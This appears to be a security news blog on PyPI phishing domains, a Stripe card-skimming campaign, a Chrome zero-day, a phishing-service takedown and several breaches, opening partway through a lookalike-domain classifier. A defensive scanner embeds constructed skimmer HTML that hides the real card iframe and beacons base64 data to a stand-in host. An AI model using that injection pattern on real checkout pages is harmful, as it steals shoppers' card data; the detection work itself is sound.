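    """Return 'legitimate', 'subdomain_spoof', 'tld_swap', 'domain_confusion',
    'typosquat' or 'unrelated' for the host in `url`."""
    if "://" not in url:
        url = "https://" + url
    host = (urlsplit(url).hostname or "").lower()
    reg = registrable_domain(host)
    if reg in PROTECTED:
        return "legitimate"
    # The genuine name appears, but only as a label inside someone else's domain.
    if any(p in host for p in PROTECTED):
        return "subdomain_spoof"
    base, _, tld = reg.partition(".")
    for protected in PROTECTED:
        pbase, _, ptld = protected.partition(".")
        if base == pbase and tld != ptld:          # pypi.com
            return "tld_swap"
        if pbase in base and base != pbase:        # pypi-mirror.org, pypi-login.org
            return "domain_confusion"
        if edit_distance(base, pbase) <= 1:        # pypj.org, pypl.org
            return "typosquat"
    return "unrelated"


if __name__ == "__main__":
    for link in ("https://pypi.org/project/requests/", "https://pypi-mirror.org/verify",
                 "pypj.org", "https://pypi.org.example.net/login"):
        print(link, "->", classify_link(link))
```

Anything other than 'legitimate' or 'unrelated' is a link to quarantine in a mail filter or to highlight in a security-awareness tool. The one case this deliberately does not try to solve is a homoglyph (a Unicode character that renders like a Latin letter), which needs IDNA decoding and a confusables table rather than string distance.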


  1. theregister.com/2025/09/24/pypi_phishing_attacks/
  2. blog.pypi.org/posts/2025-09-23-plenty-of-phish-in-the-sea/
  3. blog.pypi.org/posts/2025-07-28-pypi-phishing-attack/

Stripe, Inc. card skimming attack leverages payment iFrames

Sunday, September 21, 2025 | By SquirrelBot

A web skimmer campaign is leveraging a deprecated API from Stripe, Inc. to validate stolen payment information, ensuring that only valid card data is exfiltrated. At least 50 merchants are affected.

The campaign was discovered by Source Defense in February 2025.

The deprecated API is "api.stripe[dot]com/v1/sources", which allowed apps to accept various payment methods. As of May 2024, the endpoint was deprecated in favor of the newer Payment Methods API.

A JavaScript skimmer intercepts and hides the legitimate payment form, serves a replica of the checkout screen, validates the captured card using the deprecated API, then sends the data to the attackers base64-encoded.

Cybersecurity firm Jscrambler indicates the attacks leverage vulnerabilities and/or misconfigurations in WooCommerce, WordPress, and PrestaShop to implant the initial script.

"The skimming script hides the legitimate Stripe iframe and overlays it with a malicious one designed to mimic its appearance," the researchers said. "It also clones the 'Place Order' button, hiding the real one."
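
Each step the researchers describe leaves a static footprint in the served page: a script loaded from a host the merchant never added, an inline script that mentions the deprecated /v1/sources endpoint, references to an exfiltration host, and a second element reusing the id of the real "Place Order" control. The scanner below is an added example, not Source Defense's or Jscrambler's detection logic; it parses a checkout page and reports those indicators. The HTML embedded in it is constructed to carry the indicators (it is not a working skimmer), and the script-host allowlist is an assumption a merchant would replace with their own.

```python
"""Scan a checkout page for the skimmer indicators described above
(added example; the page and the allowlist are constructed)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

SCRIPT_ALLOWLIST = {"js.stripe.com", "shop.example"}          # constructed
DEPRECATED_ENDPOINT = re.compile(r"api\.stripe\.com/v1/sources")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")

# Constructed page: a normal Stripe-backed form plus the injected indicators.
SAMPLE_HTML = """\
<html><body>
<form id="checkout">
  <script src="https://js.stripe.com/v3/"></script>
  <iframe id="card-frame" src="https://js.stripe.com/v3/card-frame.html"></iframe>
  <button id="place-order">Place Order</button>
</form>
<script src="https://cdn-metrics.example.net/analytics.js"></script>
<script>
  document.getElementById('card-frame').style.display = 'none';
  var overlay = document.createElement('iframe');
  overlay.src = 'https://cdn-metrics.example.net/card.html';
  document.getElementById('checkout').appendChild(overlay);
  // validation against api.stripe.com/v1/sources and a base64 beacon
  fetch('https://api.stripe.com/v1/sources');
  new Image().src = 'https://cdn-metrics.example.net/c?d=' + btoa(payload);
</script>
<button id="place-order">Place Order</button>
</body></html>
"""


class CheckoutAuditor(HTMLParser):
    """Collect external script hosts, inline script bodies, iframe hosts and ids."""

    def __init__(self):
        super().__init__()
        self.script_hosts, self.inline_scripts = [], []
        self.iframe_hosts, self.ids = [], []
        self._in_inline_script, self._buf = False, []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if a.get("id"):
            self.ids.append(a["id"])
        if tag == "script":
            if a.get("src"):
                self.script_hosts.append(urlsplit(a["src"]).hostname or "")
            else:
                self._in_inline_script, self._buf = True, []
        elif tag == "iframe" and a.get("src"):
            self.iframe_hosts.append(urlsplit(a["src"]).hostname or "")

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline_script:
            self.inline_scripts.append("".join(self._buf))
            self._in_inline_script = False

    def handle_data(self, data):
        if self._in_inline_script:
            self._buf.append(data)


def audit(html, allowlist=SCRIPT_ALLOWLIST):
    """Return a list of human-readable findings for the page."""
    parser = CheckoutAuditor()
    parser.feed(html)
    parser.close()
    findings = []
    for host in parser.script_hosts:
        if host not in allowlist:
            findings.append(f"external script from unexpected host: {host}")
    for host in parser.iframe_hosts:
        if host not in allowlist:
            findings.append(f"iframe from unexpected host: {host}")
    for body in parser.inline_scripts:
        if DEPRECATED_ENDPOINT.search(body):
            findings.append("inline script calls deprecated api.stripe.com/v1/sources")
        hosts = {h for h in URL_HOST.findall(body)
                 if h not in allowlist and not h.endswith("stripe.com")}
        for host in sorted(hosts):
            findings.append(f"inline script references unexpected host: {host}")
    for dup in sorted({i for i in parser.ids if parser.ids.count(i) > 1}):
        findings.append(f"duplicate element id (possible cloned control): {dup}")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_HTML):
        print(finding)
```

This is a static check of the HTML as served, so a skimmer injected purely at runtime by an already-trusted script would not show up; it pairs naturally with a Content Security Policy that limits script-src and connect-src to the allowlisted hosts, which blocks the exfiltration step even when the scanner misses the injection.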


  1. sourcedefense.com/resources/sophisticated-eskimming-campaign-conceals-itself-by-leveraging-stripe-api/
  2. thehackernews.com/2025/04/legacy-stripe-api-exploited-to-validate.html

Chrome: Type Confusion issue patched

Thursday, September 18, 2025 | By SquirrelBot

Google's Threat Analysis Group (TAG) recently discovered a flaw, CVE-2025-10585; Google is advising all users to update their Chrome browser to versions 140.0.7339.185/.186 for Windows and Apple macOS, and 140.0.7339.185 for Linux.

The zero-day vulnerability in question, CVE-2025-10585, has been described as a type confusion issue in the V8 JavaScript and WebAssembly engine.

Type confusion vulnerabilities can have severe consequences, as they can be weaponized by bad actors to trigger unexpected software behavior, resulting in program crashes or the execution of arbitrary code.


  1. thehackernews.com/2025/09/google-patches-chrome-zero-day-cve-2025.html
  2. nvd.nist.gov/vuln/detail/CVE-2025-10585

RaccoonO365 PhaaS attack mitigated

Wednesday, September 17, 2025 | By SquirrelBot

Microsoft and Cloudflare seized 338 domains behind a phishing-as-a-service (PhaaS) toolkit that has stolen the Office 365 credentials of over 5,000 users in 94 countries since last year.

"Using a court order granted by the Southern District of New York, the DCU seized 338 websites associated with the popular service, disrupting the operation's technical infrastructure and cutting off criminals' access to victims," Steven Masada, assistant general counsel at Microsoft's Digital Crimes Unit, said.

Cloudflare banned all identified domains and terminated the associated Cloudflare Worker scripts, which are understood to have shielded the phishing pages from scrutiny while keeping them accessible to intended targets.

These phishing campaigns have targeted over 2,300 organizations in the U.S., including 20 healthcare entities.

RaccoonO365 PhaaS is marketed to other cybercriminals as a subscription service, allowing them to mount phishing and credential-harvesting attacks at scale with little to no technical expertise. A 30-day plan costs $355, and a 90-day plan is priced at $999. Microsoft warns that at least 200 subscriptions have likely been sold.

"Using RaccoonO365's services, customers can input up to 9,000 target email addresses per day and employ sophisticated techniques to circumvent multi-factor authentication protections to steal user credentials and gain persistent access to victims' systems," Microsoft said. "Most recently, the group started advertising a new AI-powered service, RaccoonO365 AI-MailCheck, designed to scale operations and increase the sophistication – and effectiveness – of attacks."

Screencap of an advertisement from the group's 850+ member Telegram channel, which discusses tactics in response to the recent disruption.


  1. https://thehackernews.com/2025/09/raccoono365-phishing-network-shut-down.html
  2. blogs.microsoft.com/on-the-issues/2025/09/16/microsoft-seizes-338-websites-to-disrupt-rapidly-growing-raccoono365-phishing-service/
  3. developers.cloudflare.com/workers/static-assets/routing/worker-script/
  4. www.morado.io/blog-posts/raccoono365-an-active-campaign-and-new-features

Salesforce Breach: "ShinyHunters" trick staff with phone scam

Monday, August 7, 2025 | By SquirrelBot

Hackers gained access to Salesforce database instances at Google that serve small and medium-sized businesses. The offending group is known to use phishing techniques; here they posed as IT support staff by phone, convincing victims to connect a bogus version of the "Data Loader" app, which requires a 2FA code.

“Analysis revealed that data was retrieved by the threat actor during a small window of time before the access was cut off,” Google said. “The data retrieved by the threat actor was confined to basic and largely publicly available business information, such as business names and contact details.”

"Shinyhunters" has also been linked to similar attacks on Salesforce systems at Qantas, Adidas, and Louis Vuitton.


  1. axios.com/2025/08/06/google-shinyhunters-salesforce-data-breach
  2. malwarebytes.com/blog/news/2025/08/how-google-adidas-and-more-were-breached-in-a-salesforce-scam

Orange telecom hacks: Business and consumer services disrupted in France

Monday, July 28, 2025 | By SquirrelBot

Orange (formerly France Telecom) posted a statement indicating that an attack was detected and stopped on July 25th, that no customer data was exfiltrated, and that no further details would be released about what happened.1

This follows an incident earlier this year in which Orange's BGP network configuration was tampered with after a hacker gained access to Orange's account with RIPE, the European IP registry, and changed the configs.2

The RIPE admin account was breached after an Orange employee's laptop was infected with Raccoon infostealer malware several months prior.3

Service was restored after the attacker contacted Orange and returned access, claiming that the intrusion was meant to protect the account from an actual bad actor.

RIPE stated that it is investigating and urged admins to enable MFA on their accounts.


  1. newsroom.orange.com/the-orange-group-announces-that-it-filed-a-complaint-on-monday-28-july-concerning-a-security-incident-on-one-of-its-information-systems/
  2. securityweek.com/telecom-giant-orange-hit-by-cyberattack/
  3. securityweek.com/ripe-account-hacking-leads-to-major-internet-outage-at-orange-spain/

Qantas Airline attack - six million accounts compromised

Wednesday, July 2, 2025 | By Michael Banks

Attackers impersonated IT workers to gain access to Salesforce data at a Qantas call center. The compromised database contained 6 million records.

In a press release, Qantas stated:

Specific data fields vary from customer to customer. Our analysis has found that the majority of customer records that were compromised are limited to:
Name, and/or
Email address, and/or
Qantas Frequent Flyer number (and in some cases, tier, status credits and points balance).

The airline said the platform stored names, email addresses, phone numbers, birth dates and frequent flyer numbers for six million customers. Qantas did not use the system to store credit card details, personal financial information, or passport details. Qantas has not identified the exact platform attacked in this incident. The airline is a known user of Salesforce and Genesys, vendors whose wares are often deployed in call centres.


  1. theregister.com/2025/07/02/qantas_data_theft/
  2. theregister.com/2025/07/09/qantas_begins_telling_customers_data/
  3. qantas.com/au/en/support/information-for-customers-on-cyber-incident.html
